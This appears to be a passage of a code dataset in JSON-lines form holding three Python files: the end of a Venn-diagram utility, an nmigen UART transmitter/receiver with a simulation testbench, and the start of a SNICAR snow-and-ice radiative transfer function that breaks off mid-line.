sp1.add_argument('fi', help = 'input file containing sets')\n sp1.add_argument('fo1', help = 'output circle coordinates')\n sp1.add_argument('fo2', help = 'output label coordinates')\n sp1.set_defaults(func = venn3_coord)\n\n args = ps.parse_args()\n if args.command:\n args.func(args)\n else:\n print('Error: need to specify a sub command\\n')\n parser.print_help()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"orionzhou/maize","sub_path":"apps/venn3.py","file_name":"venn3.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"23495500390","text":"#!/usr/bin/env nmigen\n\nfrom nmigen import *\n\nfrom nmigen_lib.util import delay\nfrom nmigen_lib.util.main import Main\n\n\nclass UART(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n self.divisor = divisor\n self.data_bits = data_bits\n\n self.tx_data = Signal(data_bits)\n self.tx_pin = Signal()\n self.tx_trg = Signal()\n self.tx_rdy = Signal()\n\n self.rx_pin = Signal(reset=1)\n self.rx_rdy = Signal()\n self.rx_err = Signal()\n # self.rx_ovf = Signal() # XXX not used yet\n self.rx_data = Signal(data_bits)\n\n self.ports = (\n self.tx_data,\n self.tx_trg,\n self.tx_rdy,\n self.tx_pin,\n\n self.rx_pin,\n self.rx_rdy,\n self.rx_err,\n # self.rx_ovf,\n self.rx_data,\n )\n\n def elaborate(self, platform):\n m = Module()\n tx = UARTTx(divisor=self.divisor, data_bits=self.data_bits)\n rx = UARTRx(divisor=self.divisor, data_bits=self.data_bits)\n m.submodules.tx = tx\n m.submodules.rx = rx\n m.d.comb += [\n tx.tx_data.eq(self.tx_data),\n tx.tx_trg.eq(self.tx_trg),\n self.tx_rdy.eq(tx.tx_rdy),\n self.tx_pin.eq(tx.tx_pin),\n\n rx.rx_pin.eq(self.rx_pin),\n self.rx_rdy.eq(rx.rx_rdy),\n self.rx_err.eq(rx.rx_err),\n # self.rx_ovf.eq(rx.rx_ovf),\n self.rx_data.eq(rx.rx_data),\n ]\n return m\n\n\nclass UARTTx(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n self.divisor = divisor\n self.data_bits = data_bits\n self.tx_data = Signal(data_bits)\n self.tx_trg = Signal()\n self.tx_rdy = Signal()\n self.tx_pin = Signal(reset=1)\n self.ports = (\n self.tx_data,\n self.tx_trg,\n self.tx_pin,\n self.tx_rdy,\n )\n\n def elaborate(self, platform):\n tx_data = Signal(self.data_bits)\n tx_fast_count = Signal(range(-1, self.divisor - 1), reset=-1)\n tx_bit_count = Signal(range(-1, self.data_bits))\n\n m = Module()\n\n with m.If(tx_fast_count[-1]):\n with m.FSM():\n with m.State('IDLE'):\n with m.If(self.tx_trg):\n m.d.sync += [\n tx_data.eq(self.tx_data),\n self.tx_rdy.eq(False),\n self.tx_pin.eq(0), # start bit\n tx_bit_count.eq(self.data_bits - 1),\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.Else():\n m.d.sync += [\n self.tx_rdy.eq(True),\n tx_fast_count.eq(-1),\n ]\n m.next = 'IDLE'\n with m.State('DATA'):\n with m.If(tx_bit_count[-1]):\n m.d.sync += [\n self.tx_rdy.eq(False),\n self.tx_pin.eq(1), # stop bit\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'STOP'\n with m.Else():\n m.d.sync += [\n self.tx_pin.eq(tx_data[0]),\n tx_data.eq(tx_data[1:]),\n tx_bit_count.eq(tx_bit_count - 1),\n tx_fast_count.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.State('STOP'):\n m.d.sync += [\n # self.tx_pin.eq(1),\n self.tx_rdy.eq(True),\n # tx_fast_count.eq(self.divisor - 2),\n tx_fast_count.eq(-1),\n ]\n m.next = 'IDLE'\n\n with m.Else():\n m.d.sync += [\n tx_fast_count.eq(tx_fast_count - 1),\n ]\n return m\n\n\nclass UARTRx(Elaboratable):\n\n def __init__(self, divisor, data_bits=8):\n \"\"\"Assume no parity, 1 stop bit\"\"\"\n self.divisor = divisor\n self.data_bits = data_bits\n self.rx_pin = Signal(reset=1)\n self.rx_rdy = Signal()\n self.rx_err = Signal()\n self.dbg = Signal(4) # XXX\n # self.rx_ovf = Signal() # XXX not used yet\n self.rx_data = Signal(data_bits)\n self.ports = (self.rx_pin,\n self.rx_rdy,\n self.rx_err,\n # self.rx_ovf,\n self.rx_data,\n self.dbg, # XXX\n )\n\n def elaborate(self, platform):\n # N.B. both counters (rx_counter, rx_bits) count from n-2 to -1.\n rx_max = self.divisor - 2\n rx_counter = Signal(range(-1, rx_max + 1), reset=~0)\n rx_data = Signal(self.data_bits)\n rx_bits = Signal(range(-1, self.data_bits - 1))\n rx_resync_max = 10 * self.divisor - 2\n rx_resync_counter = Signal(range(-1, rx_resync_max + 1))\n rx_pin = Signal(reset=1)\n rx_pin1 = Signal(reset=1)\n\n m = Module()\n m.d.comb += self.dbg[0].eq(rx_counter[-1]) # XXX\n m.d.sync += [\n rx_pin.eq(rx_pin1),\n rx_pin1.eq(self.rx_pin),\n ]\n with m.If(rx_counter[-1]):\n with m.FSM():\n with m.State('IDLE'):\n with m.If(~rx_pin):\n m.d.sync += [\n rx_data.eq(0),\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n rx_counter.eq(self.divisor // 2 - 2),\n ]\n m.next = 'START'\n with m.Else():\n m.d.sync += [\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n rx_counter.eq(-1),\n ]\n m.next = 'IDLE'\n with m.State('START'):\n with m.If(rx_pin):\n m.d.sync += [\n self.rx_err.eq(True),\n rx_counter.eq(-1),\n rx_resync_counter.eq(rx_resync_max),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_bits.eq(self.data_bits - 2),\n rx_counter.eq(self.divisor - 2),\n ]\n m.next = 'DATA'\n with m.State('DATA'):\n m.d.sync += [\n rx_data.eq(Cat(rx_data[1:], rx_pin)),\n rx_counter.eq(self.divisor - 2),\n ]\n with m.If(rx_bits[-1]):\n m.next = 'STOP'\n with m.Else():\n m.d.sync += [\n rx_bits.eq(rx_bits - 1),\n ]\n m.next = 'DATA'\n with m.State('STOP'):\n with m.If(~rx_pin):\n m.d.sync += [\n self.rx_err.eq(True),\n rx_resync_counter.eq(rx_resync_max),\n rx_counter.eq(-1),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n self.rx_data.eq(rx_data),\n self.rx_rdy.eq(True),\n ]\n m.next = 'IDLE'\n\n with m.State('RESYNC'):\n m.d.sync += [\n self.rx_err.eq(False),\n rx_counter.eq(-1),\n ]\n with m.If(rx_pin):\n with m.If(rx_resync_counter[-1]):\n m.next = 'IDLE'\n with m.Else():\n m.d.sync += [\n rx_resync_counter.eq(rx_resync_counter - 1),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_resync_counter.eq(rx_resync_max),\n ]\n m.next = 'RESYNC'\n with m.Else():\n m.d.sync += [\n rx_counter.eq(rx_counter - 1),\n self.rx_rdy.eq(False),\n self.rx_err.eq(False),\n ]\n return m\n\n\nif __name__ == '__main__':\n divisor = 20\n design = UART(divisor=divisor)\n\n # Workaround nmigen issue #280\n m = Module()\n m.submodules.design = design\n tx_data = Signal(8)\n tx_trg = Signal()\n m.d.comb += design.tx_data.eq(tx_data)\n m.d.comb += design.tx_trg.eq(tx_trg)\n\n #280 with Main(design).sim as sim:\n with Main(m).sim as sim:\n\n @sim.sync_process\n def send_char():\n char = 'Q'\n yield from delay(2)\n #280 yield design.tx_data.eq(ord(char))\n #280 yield design.tx_trg.eq(True)\n yield tx_data.eq(ord(char))\n yield tx_trg.eq(True)\n yield\n #280 yield design.tx_trg.eq(False)\n yield tx_trg.eq(False)\n yield from delay(10 * divisor + 4)\n\n @sim.sync_process\n def recv_char():\n char = 'Q'\n char = chr(0x95) # Test high bit\n yield design.rx_pin.eq(1)\n yield from delay(3)\n for i in range(2):\n # Start bit\n yield design.rx_pin.eq(0)\n yield from delay(divisor)\n # Data bits\n for i in range(8):\n yield design.rx_pin.eq(ord(char) >> i & 1)\n yield from delay(divisor)\n # Stop bit\n yield design.rx_pin.eq(1)\n yield from delay(divisor)\n yield from delay(2)\n","repo_name":"kbob/icebreaker-synth","sub_path":"submodules/nmigen-examples/nmigen_lib/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":10485,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"29197617060","text":"def snicar8d_GO(DIRECT, APRX_TYP, DELTA, coszen, R_sfc, dz, rho_snw, side_length, depth, nbr_lyr, nbr_aer,\nmss_cnc_soot1, mss_cnc_soot2, mss_cnc_dust1, mss_cnc_dust2, \nmss_cnc_dust3, mss_cnc_dust4, mss_cnc_ash1, mss_cnc_GRISdust1, \nmss_cnc_GRISdust2, mss_cnc_GRISdust3, mss_cnc_GRISdustP1, \nmss_cnc_GRISdustP2, mss_cnc_GRISdustP3, mss_cnc_snw_alg, mss_cnc_glacier_algae1, \nmss_cnc_glacier_algae2, FILE_soot1, FILE_soot2, FILE_dust1, FILE_dust2, FILE_dust3, FILE_dust4, \nFILE_ash1, FILE_GRISdust1, FILE_GRISdust2, FILE_GRISdust3, FILE_GRISdustP1, FILE_GRISdustP2, \nFILE_GRISdustP3, FILE_snw_alg, FILE_glacier_algae1, FILE_glacier_algae2):\n\n\n import numpy as np\n import xarray as xr\n import matplotlib.pyplot as plt\n\n # set working directory (location of netcdf library)\n dir_base = \"/home/joe/Code/SNICAR_NeuralNet/\"\n dir_alg = \"Data/Algal_Optical_Props/\"\n dir_GO_files = \"Data/GO_files/\"\n\n # retrieve wavelength from arbitrary choice of netcdf file\n temp = xr.open_dataset(str(dir_base+dir_GO_files+\"ice_geom_5000_5000.nc\"))\n wvl = np.array(temp['wvl'].values)\n wvl = wvl*1e6\n nbr_wvl = len(wvl)\n\n # set reflectance of underlying surface\n R_sfc = [R_sfc for _ in range(nbr_wvl)]\n R_sfc = np.array(R_sfc)\n\n # Incoming Irradiance\n # calculate mu_not\n # mu_not = np.cos((slr_znt / 360) * 2 * np.pi() # convert radians if required\n mu_not = coszen\n flx_slr = []\n\n if DIRECT:\n\n with open(str(dir_base + dir_GO_files + \"mlw_sfc_flx_frc_clr.txt\")) as file:\n for line in file:\n line = float(line.rstrip(\"\\n\"))\n flx_slr.append(line)\n flx_slr = np.array(flx_slr)\n flx_slr[flx_slr==0]=1e-30\n Fs = flx_slr / (mu_not * np.pi)\n\n Fd = np.zeros(nbr_wvl)\n\n else:\n\n with open(str(dir_base + dir_GO_files + \"mlw_sfc_flx_frc_cld.txt\")) as file:\n for line in file:\n line = float(line.rstrip(\"\\n\"))\n flx_slr.append(line)\n \n flx_slr = np.array(flx_slr)\n flx_slr[flx_slr==0]=1e-30\n\n Fd = [flx_slr[i]/mu_not*np.pi for i in range(nbr_wvl)]\n Fs = np.zeros(nbr_wvl)\n\n # Read in ice optical properties\n # set string stubs for reading in ice optical files\n\n fl_stb1 = \"ice_geom_\"\n fl_stb2 = \".nc\"\n\n #set up empty arrays\n SSA_snw = np.empty([nbr_lyr, nbr_wvl])\n MAC_snw = np.empty([nbr_lyr, nbr_wvl])\n g_snw = np.empty([nbr_lyr, nbr_wvl])\n\n for i in np.arange(0,nbr_lyr,1):\n\n if (side_length[i] == 0) | (depth[i] == 0):\n\n print(\"ERROR: ICE GRAIN LENGTH AND/OR DEPTH SET TO ZERO\")\n\n else:\n\n s1 = str(side_length[i])\n s2 = str(depth[i])\n FILE_ice = str(dir_base+dir_GO_files+fl_stb1+s1+\"_\"+s2+fl_stb2)\n \n\n # read in single scattering albedo, MAC and g for ice crystals in each layer\n with xr.open_dataset(FILE_ice) as temp:\n SSA = temp['ss_alb'].values\n SSA_snw[i,:] = SSA\n\n ext_cff_mss = temp['ext_cff_mss'].values\n MAC_snw[i,:] = ext_cff_mss\n\n asm_prm = temp['asm_prm'].values\n g_snw[i,:] = asm_prm\n\n # open netcdf files\n FILE_soot1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_soot1))\n FILE_soot2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_soot2))\n FILE_dust1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust1))\n FILE_dust2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust2))\n FILE_dust3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust3))\n FILE_dust4 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_dust4))\n FILE_ash1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_ash1))\n FILE_GRISdust1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust1))\n FILE_GRISdust2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust2))\n FILE_GRISdust3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdust3))\n FILE_GRISdustP1 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP1))\n FILE_GRISdustP2 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP2))\n FILE_GRISdustP3 = xr.open_dataset(str(dir_base + dir_GO_files+ FILE_GRISdustP3))\n FILE_snw_alg = xr.open_dataset(FILE_snw_alg)\n FILE_glacier_algae1 = xr.open_dataset(FILE_glacier_algae1)\n FILE_glacier_algae2 = xr.open_dataset(FILE_glacier_algae2)\n\n # read in aerosol optical properties\n SSAaer = np.zeros([nbr_aer,nbr_wvl])\n\n SSAaer[0,:] = FILE_soot1['ss_alb'].values\n SSAaer[1,:] = FILE_soot2['ss_alb'].values\n SSAaer[2,:] = FILE_dust1['ss_alb'].values\n SSAaer[3,:] = FILE_dust2['ss_alb'].values\n SSAaer[4,:] = FILE_dust3['ss_alb'].values\n SSAaer[5,:] = FILE_dust4['ss_alb'].values\n SSAaer[6,:] = FILE_ash1['ss_alb'].values\n SSAaer[7,:] = FILE_GRISdust1['ss_alb'].values\n SSAaer[8,:] = FILE_GRISdust2['ss_alb'].values\n SSAaer[9,:] = FILE_GRISdust3['ss_alb'].values\n SSAaer[10,:] = FILE_GRISdustP1['ss_alb'].values\n SSAaer[11,:] = FILE_GRISdustP2['ss_alb'].values\n SSAaer[12,:] = FILE_GRISdustP3['ss_alb'].values\n SSAaer[13,:] = FILE_snw_alg['ss_alb'].values\n SSAaer[14,:] = FILE_glacier_algae1['ss_alb'].values\n SSAaer[15,:] = FILE_glacier_algae2['ss_alb'].values\n\n MACaer = np.zeros([nbr_aer, nbr_wvl])\n\n MACaer[0,:] = FILE_soot1['ext_cff_mss'].values\n MACaer[1,:] = FILE_soot2['ext_cff_mss'].values\n MACaer[2,:] = FILE_dust1['ext_cff_mss'].values\n MACaer[3,:] = FILE_dust2['ext_cff_mss'].values\n MACaer[4,:] = FILE_dust3['ext_cff_mss'].values\n MACaer[5,:] = FILE_dust4['ext_cff_mss'].values\n MACaer[6,:] = FILE_ash1['ext_cff_mss'].values\n MACaer[7,:] = FILE_GRISdust1['ext_cff_mss'].values\n MACaer[8,:] = FILE_GRISdust2['ext_cff_mss'].values\n MACaer[9,:] = FILE_GRISdust3['ext_cff_mss'].values\n MACaer[10,:] = FILE_GRISdustP1['ext_cff_mss'].values\n MACaer[11,:] = FILE_GRISdustP2['ext_cff_mss'].values\n MACaer[12,:] = FILE_GRISdustP3['ext_cff_mss'].values\n MACaer[13,:] = FILE_snw_alg['ext_cff_mss'].values\n MACaer[14,:] = FILE_glacier_algae1['ext_cff_mss'].values\n MACaer[15,:] = FILE_glacier_algae2['ext_cff_mss'].values\n\n Gaer = np.zeros([nbr_aer,nbr_wvl])\n\n Gaer[0,:] = FILE_soot1['asm_prm'].values\n Gaer[1,:] = FILE_soot2['asm_prm'].values\n Gaer[2,:] = FILE_dust1['asm_prm'].values\n Gaer[3,:] = FILE_dust2['asm_prm'].values\n Gaer[4,:] = FILE_dust3['asm_prm'].values\n Gaer[5,:] = FILE_dust4['asm_prm'].values\n Gaer[6,:] = FILE_ash1['asm_prm'].values\n Gaer[7,:] = FILE_GRISdust1['asm_prm'].values\n Gaer[8,:] = FILE_GRISdust2['asm_prm'].values\n Gaer[9,:] = FILE_GRISdust3['asm_prm'].values\n Gaer[10,:] = FILE_GRISdustP1['asm_prm'].values\n Gaer[11,:] = FILE_GRISdustP2['asm_prm'].values\n Gaer[12,:] = FILE_GRISdustP3['asm_prm'].values\n Gaer[13,:] = FILE_snw_alg['asm_prm'].values\n Gaer[14,:] = FILE_glacier_algae1['asm_prm'].values\n Gaer[15,:] = FILE_glacier_algae2['asm_prm'].values\n\n\n # load mass concentrations per layer into numpy array (one row per layer, one column per umpurity)\n # and convert to kg/kg unit\n\n MSSaer = np.zeros([nbr_lyr, nbr_aer])\n MSSaer[0:nbr_lyr,0] = mss_cnc_soot1\n MSSaer[0:nbr_lyr,1] = mss_cnc_soot2\n MSSaer[0:nbr_lyr,2] = mss_cnc_dust1\n MSSaer[0:nbr_lyr,3] = mss_cnc_dust2\n MSSaer[0:nbr_lyr,4] = mss_cnc_dust3\n MSSaer[0:nbr_lyr,5] = mss_cnc_dust4\n MSSaer[0:nbr_lyr,6] = mss_cnc_ash1\n MSSaer[0:nbr_lyr,7] = mss_cnc_GRISdust1\n MSSaer[0:nbr_lyr,8] = mss_cnc_GRISdust2\n MSSaer[0:nbr_lyr,9] = mss_cnc_GRISdust3\n MSSaer[0:nbr_lyr,10] = mss_cnc_GRISdustP1\n MSSaer[0:nbr_lyr,11] = mss_cnc_GRISdustP2\n MSSaer[0:nbr_lyr,12] = mss_cnc_GRISdustP3\n MSSaer[0:nbr_lyr,13] = mss_cnc_snw_alg\n MSSaer[0:nbr_lyr,14] = mss_cnc_glacier_algae1\n MSSaer[0:nbr_lyr,15] = mss_cnc_glacier_algae2\n\n MSSaer = MSSaer*1e-9\n\n\n #####################################\n # Begin solving Radiative Transfer\n #####################################\n\n \"\"\"\n #1. Calculate effective tau (optical depth), SSA (single scattering albedo) and \n # g (assymetry parameter) for the ice + impurities mixture.\n\n # SSA and g for the individual components has been calculated using Mie theory and\n # stored in a netcdf file. Here, these values are combined to give an overall\n # SSA and g for the ice + impurity mixture\n \n \"\"\"\n\n # initialize arrays\n g_sum = np.zeros([nbr_lyr, nbr_wvl])\n SSA_sum = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau = np.zeros([nbr_lyr, nbr_wvl])\n SSA = np.zeros([nbr_lyr, nbr_wvl])\n g = np.zeros([nbr_lyr, nbr_wvl])\n L_aer = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau_aer = np.zeros([nbr_lyr, nbr_aer, nbr_wvl])\n tau_sum = np.zeros([nbr_lyr, nbr_wvl])\n SSA_sum = np.zeros([nbr_lyr, nbr_wvl])\n L_snw = np.zeros(nbr_lyr)\n tau_snw = np.zeros([nbr_lyr,nbr_wvl])\n direct = np.zeros([nbr_lyr,nbr_wvl])\n F_net = np.zeros([nbr_lyr, nbr_wvl])\n F_btm_net = np.zeros([1,nbr_wvl])\n F_top_net = np.zeros([1,nbr_wvl])\n intensity = np.zeros([nbr_lyr, nbr_wvl])\n F_top_pls = np.zeros([1,nbr_wvl])\n F_up = np.zeros([nbr_lyr,nbr_wvl])\n F_down = np.zeros([nbr_lyr,nbr_wvl])\n F_net2 = np.zeros([nbr_lyr, nbr_wvl])\n intensity2 = np.zeros([nbr_lyr, nbr_wvl])\n intensity2_top = np.zeros(nbr_wvl)\n F_abs = np.zeros([nbr_lyr, nbr_wvl])\n abs_vis = np.zeros(nbr_lyr)\n abs_nir = np.zeros(nbr_lyr)\n\n\n # for each layer, the layer mass (L) is density * layer thickness\n # for each layer the optical depth is the layer mass * the mass extinction coefficient\n # first for the ice in each layer\n for i in range(nbr_lyr):\n L_snw[i] = rho_snw[i] * dz[i]\n tau_snw[i, :] = L_snw[i] * MAC_snw[i, :]\n\n # then for the LAPs in each layer\n for i in range(nbr_lyr):\n for j in range(nbr_aer):\n L_aer[i, j, :] = np.multiply(L_snw[i], MSSaer[i, j])\n tau_aer[i, j, :] = np.multiply(L_aer[i, j, :], MACaer[j, :])\n\n tau_sum = tau_sum + tau_aer[i, j, :]\n SSA_sum = SSA_sum + (tau_aer[i, j, :] * SSAaer[j, :])\n g_sum = g_sum + (tau_aer[i, j, :] * SSAaer[j, :] * Gaer[j, :])\n\n # finally, for each layer calculate the effective SSA, tau and g for the snow+LAP\n for i in range(nbr_lyr):\n tau[i,:] = tau_sum[i,:] + tau_snw[i,:]\n SSA[i,:] = (1/tau[i,:]) * (SSA_sum[i,:] + SSA_snw[i,:] * tau_snw[i,:])\n g[i, :] = (1 / (tau[i, :] * (SSA[i, :]))) * (g_sum[i,:] + (g_snw[i, :] * SSA_snw[i, :] * tau_snw[i, :]))\n\n\n ############################################\n # PERFORM DELTA TRANSFORMATION IF REQUIRED\n ############################################\n # The star represents the delta transformed quantity\n # if no delat transformation is applied, the starred quantity\n # is equal to the unstarred quantity\n\n if DELTA:\n g_star = g/(1+g)\n SSA_star = ((1-(g**2))*SSA)/(1-(SSA*(g**2)))\n tau_star = (1-(SSA*(g**2)))*tau\n\n else:\n g_star = g\n SSA_star = SSA\n tau_star = tau\n\n\n # CALCULATE TOTAL OPTICAL DEPTH OF ENTIRE COLUMN\n # i.e. tau_clm = total optical depth from upper boundary \n # to upper boundary of layer n. This is therefore a cumulative\n # quantity - subsequently lower layers contain the sum of the\n # # optical depth of all overlying layers\n\n tau_clm = np.zeros([nbr_lyr,nbr_wvl])\n for i in np.arange(1,nbr_lyr,1):\n #start loop from 2nd layer, i.e. index = 1\n tau_clm[i,:] = tau_clm[i-1,:]+tau_star[i-1,:]\n\n # SET BOUNDARY CONDITION: BOTTOM BOUNDARY\n # calculate radiation reflected skywards by underlying surface (i.e. lower model boundary)\n # remainder is lost\n\n S_sfc = R_sfc * mu_not * np.exp(-(tau_clm[nbr_lyr-1,:] + tau_star[nbr_lyr-1,:])/mu_not)*np.pi * Fs\n\n ######################################################\n # Apply Two-Stream Approximation (Toon et al, table 1)\n ######################################################\n \"\"\"\n Three 2-stream approximations are available: Eddington,\n Quadrature and hemispheric mean. The equations for each\n approximation are provided in Toon et al. (1989) Table 1.\n\n The hemispheric mean scheme is derived by assuming that the\n phase function is equal to 1 + g in the forward scattering \n hemisphere and to 1 - g in the backward scattering hemisphere. \n The asymmetry parameter is g. The hemispheric mean is only\n useful for infrared wavelengths\n\n \"\"\"\n\n if APRX_TYP == 1:\n #apply Eddington approximation\n gamma1 = (7-(SSA_star * (4+(3*g_star))))/4\n gamma2 = -(1-(SSA_star*(4-(3*g_star))))/4\n gamma3 = (2-(3*g_star*mu_not))/4\n gamma4 = 1-gamma3\n mu_one = 0.5\n\n elif APRX_TYP==2:\n #apply quadrature approximation\n gamma1 = np.sqrt(3)*(2-(SSA_star*(1+g_star)))/2\n gamma2 = SSA_star * np.sqrt(3)*(1-g_star)/2\n gamma3 = (1-(np.sqrt(3)*g_star*mu_not))/2\n gamma4 = 1-gamma3\n mu_one = 1/np.sqrt(3)\n\n elif APRX_TYP==3:\n #apply hemispheric mean approximation\n gamma1 = 2 - (SSA_star*(1+g_star))\n gamma2 = SSA_star*(1-g_star)\n gamma3 = (1-(np.sqrt(3) * g_star*mu_not))/2\n gamma4 = 1-gamma3\n mu_one = 0.5\n\n\n # Toon et al equation 21 and 22\n # Note that the values of lam and GAMMA depend upon gamma1 and gamma2, which\n # vary depending upon the two-stream approximation used\n # variable \"lambda\" renamed \"lam\" to avoid confusion with lambda function\n lam = np.sqrt(abs((gamma1**2)-(gamma2**2)))\n GAMMA = gamma2/(gamma1+lam)\n\n # calculate coefficients required for tridiagonal matrix calculation\n # (Toon et al Equation 44)\n e1 = 1+(GAMMA*np.exp(-lam*tau_star))\n e2 = 1-(GAMMA*np.exp(-lam*tau_star))\n e3 = GAMMA+np.exp(-lam*tau_star)\n e4 = GAMMA-np.exp(-lam*tau_star)\n\n\n ######################################\n # Calculate C-functions\n ######################################\n\n # C is the direct beam flux calculated at the top and bottom of each layer, i,\n # see Toon equations 23 and 24\n\n \"\"\" N.B. consider adding in stability check here as per Flanner's Matlab code \"\"\"\n\n C_pls_btm = np.zeros([nbr_lyr,nbr_wvl])\n C_mns_btm = np.zeros([nbr_lyr,nbr_wvl])\n C_pls_top = np.zeros([nbr_lyr, nbr_wvl])\n C_mns_top = np.zeros([nbr_lyr, nbr_wvl])\n\n for i in np.arange(0,nbr_lyr,1):\n\n if np.sum(Fs) > 0.0:\n\n C_pls_btm[i,:] = (SSA_star[i,:]*np.pi*Fs*np.exp(-(tau_clm[i,:]+tau_star[i,:])/mu_not)*\n (((gamma1[i,:]-(1/mu_not))*gamma3[i,:])+(gamma4[i,:]*gamma2[i,:])))\\\n /((lam[i,:]**2)-(1/(mu_not**2)))\n\n C_mns_btm[i,:] = (SSA_star[i,:]*np.pi*Fs*\n np.exp(-(tau_clm[i,:]+tau_star[i,:])/mu_not) * (((gamma1[i,:]+(1/mu_not))*gamma4[i,:])+\n (gamma2[i,:]*gamma3[i,:])))/((lam[i,:]**2)-(1/mu_not**2))\n\n C_pls_top[i,:] = (SSA_star[i,:] * np.pi * Fs * np.exp(-tau_clm[i,:]/mu_not)* ((gamma1[i,:] - (1/mu_not))\n * gamma3[i,:] + (gamma4[i,:]*gamma2[i,:])))/((lam[1,:]**2)-(1/mu_not**2))\n\n C_mns_top[i,:] = (SSA_star[i,:] * np.pi * Fs * np.exp(-tau_clm[i,:]/mu_not) * ((gamma1[i,:]+(1/mu_not))\n * gamma4[i,:] + (gamma2[i,:]*gamma3[i,:])))/((lam[i,:]**2)-(1/mu_not**2))\n\n else:\n # no direct-beam flux:\n C_pls_btm[i,:] = 0\n C_mns_btm[i,:] = 0\n C_pls_top[i,:] = 0\n C_mns_top[i,:] = 0\n\n\n # Toon equations 41-43.\n # Boundary values for i=1 and i=2nbr_lyr, specifics for i=odd and i=even\n # Set up lists\n A = np.zeros([2*nbr_lyr,nbr_wvl])\n B = np.zeros([2*nbr_lyr,nbr_wvl])\n D = np.zeros([2*nbr_lyr,nbr_wvl])\n E = np.zeros([2*nbr_lyr,nbr_wvl])\n\n ###########################################\n # Initialize tridiagonal matrix solution\n ###########################################\n\n # expanding the number of layers to 2*nbr_lyr so that fluxes at upper and lower\n # layer boundaries can be resolved. This section was confusing to code - for each layer\n # index (n) a second pair of indices (2 x i) are required. Different solutions are\n # applied depending upon whether i is even or odd. To translate the indexing for this \n # from FORTRAN/MATLAB into Python, it was necessary to assert n = (i/2)-1 for even layers\n # and n = floor(i/2) for odd layers, with specific rules for the boundaries i = 0 and \n # i = nbr_lyrs-1 (i.e. top surface and bottom surface).\n\n for i in np.arange(0,2*nbr_lyr,1):\n \n #TOP LAYER \n if i==0:\n A[0,:] = 0.0\n B[0,:] = e1[0,:]\n D[0,:] = -e2[0,:]\n E[0,:] = Fd-C_mns_top[0,:]\n\n # BOTTOM LAYER\n elif i== 2*nbr_lyr-1:\n A[i,:] = e1[nbr_lyr-1,:]-(R_sfc * e3[nbr_lyr-1,:])\n B[i,:] = e2[nbr_lyr-1,:]-(R_sfc * e4[nbr_lyr-1,:])\n D[i,:] = 0.0\n E[i,:] = S_sfc[:] - C_pls_btm[nbr_lyr-1,:] + (R_sfc * C_mns_btm[nbr_lyr-1,:])\n\n\n # EVEN NUMBERED LAYERS\n elif i%2==0:\n n = int(i/2)-1\n A[i,:] = (e2[n,:] * e3[n,:])-(e4[n,:] * e1[n,:])\n B[i,:] = (e1[n,:] * e1[n+1,:])-(e3[n,:] * e3[n+1,:])\n D[i,:] = (e3[n,:] * e4[n+1,:])-(e1[n,:] * e2[n+1,:])\n E[i,:] = (e3[n,:] * (C_pls_top[n+1,:] - C_pls_btm[n,:])) + (e1[n,:] * (C_mns_btm[n,:] - C_mns_top[n+1,:]))\n\n # ODD NUMBERED LAYERS\n elif (i%2 ==1) and (i < 2*nbr_lyr-1):\n\n n = int(np.floor(i/2))\n A[i,:] = (e2[n+1,:] * e1[n,:])-(e3[n,:] * e4[n+1,:])\n B[i,:] = (e2[n,:] * e2[n+1,:])-(e4[n,:] * e4[n+1,:])\n D[i,:] = (e1[n+1,:] * e4[n+1,:])-(e2[n+1,:] * e3[n+1,:])\n E[i,:] = (e2[n+1,:] * (C_pls_top[n+1,:] - C_pls_btm[n,:])) + (e4[n+1,:] * (C_mns_top[n+1,:] - C_mns_btm[n,:]))\n\n # Now the actual tridiagonal matrix solving. Simply dividing A/B and E/B \n # throws an exception due to division by zero. Here we use numpy's nan_to_num\n # function to achieve the division where possible and replace nans with zeros.\n # We also set numpy to ignore the division error.\n\n # for bottom layer only\n # Toon et al Eq 45\n AS = np.zeros([2*nbr_lyr,nbr_wvl])\n DS = np.zeros([2*nbr_lyr,nbr_wvl])\n\n np.seterr(divide='ignore',invalid='ignore')\n AS[2*nbr_lyr-1,:] = np.nan_to_num(A[2*nbr_lyr-1,:]/B[2*nbr_lyr-1,:])\n DS[2*nbr_lyr-1,:] = np.nan_to_num(E[2*nbr_lyr-1,:]/B[2*nbr_lyr-1,:])\n\n # for all layers above bottom layer, starting at second-to-bottom and progressing towards\n # surface:\n # Toon et al Eq 46\n X = np.zeros([nbr_lyr*2,nbr_wvl])\n for i in np.arange(2*nbr_lyr-2,-1, -1):\n X[i,:] = 1/(B[i,:]-(D[i,:] * AS[i+1,:]))\n AS[i,:] = np.nan_to_num(A[i,:]*X[i,:])\n DS[i,:] = np.nan_to_num((E[i,:]-(D[i,:]*DS[i+1,:]))*X[i,:])\n\n # then for all layers, progressing from surface to bottom\n # Toon et al Eq 47\n Y = 